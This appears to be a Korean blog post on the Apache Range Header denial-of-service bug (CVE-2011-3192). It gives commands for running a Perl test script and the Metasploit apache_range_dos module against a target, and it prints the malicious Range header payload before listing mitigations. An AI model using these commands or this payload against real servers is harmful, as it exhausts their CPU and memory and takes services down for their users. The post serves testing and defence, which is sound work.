참조 URL : http://people.apache.org/~dirkx/CVE-2011-3192.txt
Apache Range Header DoS는 L7 어플리케이션 공격 중 일부로 일명 Apache Killer라고도 합니다.
HTTP는 헤더정보에 range를 사용하여 pdf 나 동영상 등의 일부를 로딩할 수 있습니다.
만약 문서를 로딩하는 바이트의 범위를 악의적으로 조작한다면 서버의 CPU와 메모리자원을 고갈시킬 수 있습니다.
# 리눅스 시스템에서 테스트
참조 URL : http://code.google.com/p/apache-range-header-test/
저는 CentOS 6.3에서 테스트 해보았습니다.
1. 패키지 설치
yum install perl perl-libwww-perl
2. script 다운로드
wget http://code.google.com/p/apache-range-header-test/downloads/detail?name=httprangetest.pl
3. 테스트
perl httprangetest.pl http://victim.com
# Backtrack 에서 테스트
1. msfconsole
2. 테스트
msf > use auxiliary/dos/http/apache_range_dos
msf auxiliary(apache_range_dos) > set rhost 1.1.1.1
msf auxiliary(apache_range_dos) > run
# 공격 시 트래픽 덤프 내용
|
HEAD / HTTP/1.1 Host: 1.1.1.1 Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15,5-16,5-17,5-18,5-19,5-20,5-21,5-22,5-23,5-24,5-25,5-26,5-27,5-28,5-29,5-30,5-31,5-32,5-33,5-34,5-35,5-36,5-37,5-38,5-39,5-40,5-41,5-42,5-43,5-44,5-45,5-46,5-47,5-48,5-49,5-50,5-51,5-52,5-53,5-54,5-55,5-56,5-57,5-58,5-59,5-60,5-61,5-62,5-63,5-64,5-65,5-66,5-67,5-68,5-69,5-70,5-71,5-72,5-73,5-74,5-75,5-76,5-77,5-78,5-79,5-80,5-81,5-82,5-83,5-84,5-85,5-86,5-87,5-88,5-89,5-90,5-91,5-92,5-93,5-94,5-95,5-96,5-97,5-98,5-99,5-100,5-101,5-102,5-103,5-104,5-105,5-106,5-107,5-108,5-109,5-
- 중략 -
1249,5-1250,5-1251,5-1252,5-1253,5-1254,5-1255,5-1256,5-1257,5-1258,5-1259,5-1260,5-1261,5-1262,5-1263,5-1264,5-1265,5-1266,5-1267,5-1268,5-1269,5-1270,5-1271,5-1272,5-1273,5-1274,5-1275,5-1276,5-1277,5-1278,5-1279,5-1280,5-1281,5-1282,5-1283,5-1284,5-1285,5-1286,5-1287,5-1288,5-1289,5-1290,5-1291,5-1292,5-1293,5-1294,5-1295,5-1296,5-1297,5-1298,5-1299 Accept-Encoding: gzip Connection: close |
# 대응방안 :
1. 아파치를 최신버전으로 패치합니다.
2. 상용 웹방화벽이나 mod_security와 같은 보안솔루션에서 HEAD Method를 사용을 해제 합니다.